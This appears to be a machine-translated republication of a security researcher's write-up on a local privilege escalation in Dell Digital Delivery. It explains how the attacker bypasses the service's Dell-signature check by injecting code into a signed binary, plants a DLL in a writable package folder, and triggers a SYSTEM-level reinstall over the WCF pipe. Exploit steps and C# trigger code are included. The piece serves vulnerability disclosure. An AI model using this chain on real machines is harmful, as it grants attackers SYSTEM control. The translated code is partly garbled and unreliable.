Shulou(Shulou.com)05/31 Report--

This article is about how to achieve Dell Digital Delivery local rights enhancement analysis, the editor feels very practical, so share with you to learn, I hope you can learn something after reading this article, do not say much, follow the editor to have a look.

Here's how this vulnerability in Dell Digital Transport (hereinafter referred to as DDD,Dell Digital Delivery) is exploited. So far, no one has exploited this loophole to cause harm. Dell has issued a security report on this vulnerability.

SupportAssist and DDD are complex, so there will be a lot of vulnerabilities. If you are interested in exploiting local rights loopholes in the large CentralPlus application, you can try these two programs.

Dell's Digital Delivery is used to install software. It allows users to buy and manage software, and DDD is pre-installed on most Dell computers.

Bug

DDD runs with SYSTEM privileges, the service name is DeliveryService, and the program name is DeliveryService.exe. DeliveryTray.exe is a user-level component that allows users to manage and install the software.

The communication between DeliveryTray and DeliveryService is done through a Windows Communication Foundation (WCF) named pipe. WCF is the standard way for two processes to exchange data. Like the REST API of the web server, WCF allows the service to register as the processing side and to describe the main functions.

The initialization of the WCF named pipe in Dell.ClientFulfillmentService.Controller.Initialize is as follows:

This._host = WcfServiceUtil.StandupServiceHost (typeof (UiWcfSession))

Typeof (IClientFulfillmentPipeService)

"DDDService")

The initialization process called Dell.NamedPipe.StandupServiceHost:

ServiceHost host = null

String apiUrl = "net.pipe://localhost/DDDService/IClientFulfillmentPipeService"

Uri realUri = new Uri ("net.pipe://localhost/" + Guid.NewGuid () .ToString ())

Tryblock.Run (delegate

{

Host = new ServiceHost (classType, new Uri []

{

RealUri

});

Host.AddServiceEndpoint (interfaceType, WcfServiceUtil.CreateDefaultBinding (), string.Empty)

Host.Open ()

}, null, null)

AuthenticationManager.Singleton.RegisterEndpoint (apiUrl, realUri.AbsoluteUri)

The service registered by apiUrl starts listening, and AuthenticationManager's singleton handles the request. As soon as there is a request, AuthenticationManager passes it to the AuthPipeWorker function for the following authentication:

String execuableByProcessId = AuthenticationManager.GetExecuableByProcessId (processId)

Bool flag2 =! FileUtils.IsSignedByDell (execuableByProcessId)

If (! flag2)

{

...

The request establishes a connection only if the other end is a Dell-signed binary.

This is a new protection between version 3.1 (where I originally tested it) and version 3.5 (now the latest version, 3.5.1001.0), and Dell may be aware of a loophole. But the protection is far from enough. I can bypass this precaution by generating a Dell-signed binary file (such as DeliveryTray.exe) and injecting code into it. After the code is injected, you can access the WCF API of the privileged service.

Endpoint services are implemented by Dell.NamedPipe and have more than a dozen functions. As follows:

ArchiveAndResetSettings

EnableEntitlements

EnableEntitlementsAsync

GetAppSetting

PingTrayApp

PollEntitlementService

RebootMachine

ReInstallEntitlement

ResumeAllOperations

SetAppSetting

SetAppState

SetEntitlementList

SetUserDownloadChoice

SetWallpaper

ShowBalloonTip

ShutDownApp

UpdateEntitlementUiState

DDD calls the application installation package "entitlements" (you can find the corresponding items in the functions listed above), and installation / reinstallation naturally refers to those packages that can be installed and have already been installed.

The first function I looked at was ReInstallEntitlement, which, as its name implies, starts a reinstall process of installed packages. The code implementation is as follows:

Private static void ReInstallEntitlementThreadStart (object reInstallArgs)

{

PipeServiceClient.ReInstallArgs ra = (PipeServiceClient.ReInstallArgs) reInstallArgs

PipeServiceClient.TryWcfCall (delegate

{

PipeServiceClient._commChannel.ReInstall (ra.EntitlementId, ra.RunAsUser)

}, string.Concat (new object []

{

"ReInstall"

Ra.EntitlementId

"

Ra.RunAsUser.ToString ()

}))

}

This function sends the parameters built according to the request to the WCF endpoint through a WCF call. ReInstallEntitlement has two parameters: a package ID and a RunAsUser flag (shown above), both of which are controlled by the caller.

Dell.ClientFulfillmentService.Controller manages the implementation of these functions on the server side, and OnReInstall handles the reloading process. It first performs some integrity checks, verifies the package signature, and then asks InstallationManager to push the reloading request into the task queue. InstallationManager has a task queue and a background thread (WorkingThread) that checks for new tasks, and InstallSoftware is called when a new installation request is received.

The package will be cached to disk and wait for reinstallation. I won't say much about the installation steps.

Unpack and install the installation package placed in C:\ ProgramData\ Dell\ DigitalDelivery\ Downloads\ Software\. For example, if we install DellDataProtection-SecurityToolsv1.9.1, you will see an installation process in the task manager:

"C:\ ProgramData\ Dell\ Digital Delivery\ Downloads\ Software\ Dell Data Protection _

Security Tools v1.9.1\ STSetup.exe "- y-gm2 / S / z"\ "CIRRUS_INSTALL

SUPPRESSREBOOT=1\ ""

The user who runs this process is determined by the controllable RunAsUser flag and, if set to False, runs from the% ProgramData% directory with SYSTEM permissions.

During the startup phase of the STSetup process, there are the following processes in the Task Manager:

C:\ ProgramData\ Dell\ Digital Delivery\ Downloads\ Software\ Dell Data Protection _ Security Tools v1.9.1\ VERSION.dll

C:\ ProgramData\ Dell\ Digital Delivery\ Downloads\ Software\ Dell Data Protection _ Security Tools v1.9.1\ UxTheme.dll

C:\ ProgramData\ Dell\ Digital Delivery\ Downloads\ Software\ Dell Data Protection _ Security Tools v1.9.1\ PROPSYS.dll

C:\ ProgramData\ Dell\ Digital Delivery\ Downloads\ Software\ Dell Data Protection _ Security Tools v1.9.1\ apphelp.dll

C:\ ProgramData\ Dell\ Digital Delivery\ Downloads\ Software\ Dell Data Protection _ Security Tools v1.9.1\ Secur32.dll

C:\ ProgramData\ Dell\ Digital Delivery\ Downloads\ Software\ Dell Data Protection _ Security Tools v1.9.1\ api-ms-win-downlevel-advapi32-l2-1-0.dll

What is interesting here is that users on the system do not have write permission to the parent directory% ProgramData%\ Dell\ DigitalDelivery\ Downloads\ Software, but they do have write permission to the installation package folder DellDataProtection-SecurityTools.

This allows non-privileged users to put arbitrary files in this directory, giving us the opportunity to use DLL injection.

Vulnerability exploitation

Exploiting vulnerabilities involves the following steps:

Put DLL in the appropriate% ProgramData% package directory

Start a new process to run the executable signed by Dell

Inject C# code into this process (running in unprivileged user space)

Connect to a WCF named pipe from the injected process

Trigger ReInstallEntitlement

Steps 4 and 5 can be done with the following C # code:

PipeServiceClient client = new PipeServiceClient ()

Client.Initialize ()

While (PipeServiceClient.AppState = = AppState.Initializing)

System.Threading.Thread.Sleep (1000)

EntitlementUiWrapper entitle = PipeServiceClient.EntitlementList [0]

PipeServiceClient.ReInstallEntitlement (entitle.ID, false)

System.Threading.Thread.Sleep (30000)

PipeServiceClient.CloseConnection ()

The classes used above are imported from NamedPipe.dll. I only selected the first optional package here and reinstalled it, and you may need to traverse the package to determine which package's reinstallation process will use your injected code.

I released the PoC on Github, and Dell has released the corresponding safety report.

The above is how to achieve Dell Digital Delivery local weight enhancement analysis, the editor believes that there are some knowledge points that we may see or use in our daily work. I hope you can learn more from this article. For more details, please follow the industry information channel.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.